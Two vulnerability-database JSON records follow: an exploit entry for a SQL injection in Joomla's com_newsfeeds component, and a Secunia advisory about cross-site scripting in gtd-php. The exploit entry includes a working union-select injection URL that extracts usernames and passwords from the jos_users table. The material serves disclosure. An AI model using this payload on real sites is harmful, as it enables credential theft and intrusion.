{"hash": "75526a059a52c0327bf3ae39f8882e383c970437faee2f59fe5875b4d0eb78ed", "id": "1337DAY-ID-12081", "lastseen": "2018-04-13T03:48:12", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e0fb8eecc3708e375773ce46f4c86f73", "key": "href"}, {"hash": "64d40a2486cf54417785025d8c26fe30", "key": "modified"}, {"hash": "64d40a2486cf54417785025d8c26fe30", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "390b9c7f72fb9f5c57ff33f4d2becbdb", "key": "reporter"}, {"hash": "6ea40f3be101fa6e4911f6c6b03646c6", "key": "sourceData"}, {"hash": "e9087492543fb10f34d2bb97ea0dd82b", "key": "sourceHref"}, {"hash": "f77b3fe8a131c1962cda53d7264043e5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-04-13T03:48:12"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/12081", "description": "Exploit for php platform in category web applications", "title": "Joomla Component com_newsfeeds SQL injection vulnerability", "history": [{"bulletin": {"hash": "e62432765e249a39b459afdb0005360b9091634b13d5b07aaee199963beb2d95", "id": "1337DAY-ID-12081", "lastseen": "2016-04-19T04:14:31", "enchantments": {"score": {"value": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/", "modified": "2016-04-19T04:14:31"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "e9254ef16758a52e3df8e1dfc6a70e0e", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f77b3fe8a131c1962cda53d7264043e5", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "64d40a2486cf54417785025d8c26fe30", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "64d40a2486cf54417785025d8c26fe30", "key": "modified"}, {"hash": "390b9c7f72fb9f5c57ff33f4d2becbdb", "key": "reporter"}, {"hash": "ae7c41889120ed8a789e43b6cd8594c7", "key": "href"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "7cd3767a7e37607db38801b5cc28e69d", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/12081", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Joomla Component com_newsfeeds SQL injection vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==========================================================\r\nJoomla Component com_newsfeeds SQL injection vulnerability\r\n==========================================================\r\n\r\n# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability\r\n# Date: 30/04/2010\r\n# Author: Archimonde\r\n# Software Link:\r\n# Version:\r\n# Tested on:\r\n# CVE :\r\n# Code :\r\n \r\nEmail : archimondera@gmail.com\r\nWebsite : xgroupvn.org - programmer.vn\r\n \r\nindex.php?option=com_newsfeeds&view=categories&feedid=[sqli]\r\n \r\nExample:\r\n \r\nhttp://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2010-04-30T00:00:00", "references": [], "reporter": "Archimonde", "modified": "2010-04-30T00:00:00", "href": "http://0day.today/exploit/description/12081"}, "lastseen": "2016-04-19T04:14:31", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==========================================================\r\nJoomla Component com_newsfeeds SQL injection vulnerability\r\n==========================================================\r\n\r\n# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability\r\n# Date: 30/04/2010\r\n# Author: Archimonde\r\n# Software Link:\r\n# Version:\r\n# Tested on:\r\n# CVE :\r\n# Code :\r\n \r\nEmail : [email\u00a0protected]\r\nWebsite : xgroupvn.org - programmer.vn\r\n \r\nindex.php?option=com_newsfeeds&view=categories&feedid=[sqli]\r\n \r\nExample:\r\n \r\nhttp://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--\r\n\r\n\n\n# 0day.today [2018-04-13] #", "published": "2010-04-30T00:00:00", "references": [], "reporter": "Archimonde", "modified": "2010-04-30T00:00:00", "href": "https://0day.today/exploit/description/12081"}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\ngtd-php Cross-Site Scripting and Script Insertion Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19512\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19512/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nCross Site Scripting\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\ngtd-php 0.x\r\nhttp://secunia.com/product/9122/\r\n\r\nDESCRIPTION:\r\nJericho has discovered some vulnerabilities in gtd-php, which can be\r\nexploited by malicious people to conduct cross-site scripting and\r\nscript insertion attacks.\r\n\r\n1) Input passed to various fields in newProject.php, newList.php,\r\nnewWaitingOn.php, newChecklist.php, newContext.php, newCategory.php,\r\nand newGoal.php is not properly sanitised before being used. This can\r\nbe exploited to inject arbitrary HTML and script code, which will be\r\nexecuted in a user's browser session in context of an affected site\r\nwhen the malicious user data is viewed.\r\n\r\n2) Input passed to the "listTitle" parameter in listReport.php, the\r\n"projectName" parameter in projectReport.php, and the\r\n"checklistTitle" parameter in checklistReport.php is not properly\r\nsanitised before being returned to the user. This can be exploited to\r\nexecute arbitrary HTML and script code in a user's browser session in\r\ncontext of an affected site.\r\n\r\nThe vulnerabilities have been confirmed in version 0.5. Other\r\nversions may also be affected.\r\n\r\nSOLUTION:\r\nEdit the source code to ensure that input is properly sanitised.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nJericho\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-04-04T00:00:00", "published": "2006-04-04T00:00:00", "id": "SECURITYVULNS:DOC:12081", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12081", "title": "[SA19512] gtd-php Cross-Site Scripting and Script Insertion Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}